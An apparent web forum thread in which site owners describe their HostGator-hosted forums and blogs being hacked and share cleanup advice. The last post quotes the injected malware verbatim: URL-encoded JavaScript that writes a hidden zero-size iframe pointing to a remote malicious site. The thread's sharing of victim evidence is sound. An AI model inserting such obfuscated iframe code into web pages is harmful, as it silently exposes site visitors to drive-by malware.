I have a forum, few blogs and directories on 2 hostgator accounts ar. Last time when my sites were hacked, it was on 1 account but this time both of hostgator account hosted sites are hacked/defaced. I have a vbulletin forum, wordpress blogs and phpld directories. What could be the reason behind this? How do i secure my sites to get rid of this problem? Could anyone offer me a professional support in this regard?
I recently updated all my wp blogs to the latest version. And for the forums, i was about to update them today as the vB 3.7 version is just released. Upon searching, i came up with few sites showing my hacked forum link: Example: http://www.pywgd.com/guanggao//zxdpc/20073301959224519.htm
Is it just your website hacked? If other sites on the same host is hacked then its hostgators fault. But if its only your site then its most probably your website. What is the link to your website? I can check other websites hosted on the same server as yours.
The guys at Hostgator say that my passwords were compromised possibly from a Psyme infection on your local PC. The hackers leave a javascript iframes on each and every file of all the websites under my account, thats a huge headache. How do i protect my PC from Psyme infection and do i need to format my PC now?
I would strongly recommend you use Ad-aware SE Personal and also run a windows defender check. Those two programmes have always helped me and never failed.
Reformat reinstall and add me anti virus and anti spam. For your old data scan first before you put back to your local computer. Such infections are common. Also as hostgator to reinstall your domains, ensure clean domain space for your new uploads.
You mean, i need to upload all the files? Ah, i have so many sites, i am fucked up, all customizations will be lost :-(
I am afraid so, you won't want to use the files inside the server that was hacked. There may be trojan etc inside there. Best to upload a new set of files. Troublesome yes, but it would safe you a lot of troubles later on.
Recentely my hostgator account was hacked too. In all my domains the following script was put in my index.php and index.html files <!-- o65 --><Script Language='Javascript'> <!-- document.write(unescape('%3C%49%46%52%41%4D%45%20%73%74%79%6C%65%3D%22%57%49%44%54%48%3A%20%30%25%3B%20%48%45%49%47%48%54%3A%20%30%70%78%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%79%66%75%63%6B%69%6E%67%2D%70%75%73%73%79%2E%63%6F%6D%2F%74%79%72%65%6B%2F%3F%74%3D%35%22%20%66%72%61%6D%65%42%6F%72%64%65%72%3D%30%20%73%63%72%6F%6C%6C%69%6E%67%3D%6E%6F%20%0A%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3E%3C%2F%49%46%52%41%4D%45%3E')); //--> </Script><!-- c65 -->